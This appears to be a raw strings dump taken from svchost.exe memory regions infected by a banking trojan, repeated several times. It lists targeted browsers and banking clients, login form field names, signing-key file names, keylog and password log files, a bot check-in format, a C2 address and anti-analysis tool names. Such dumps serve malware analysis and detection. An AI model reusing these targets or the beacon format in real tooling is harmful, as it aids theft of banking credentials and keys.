Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

LOCALSERVICE!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1156_rwx_00EF0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1156_rwx_01260000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

WINUK0FFOO83I6!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1280_rwx_005E0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_1280_rwx_00640000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

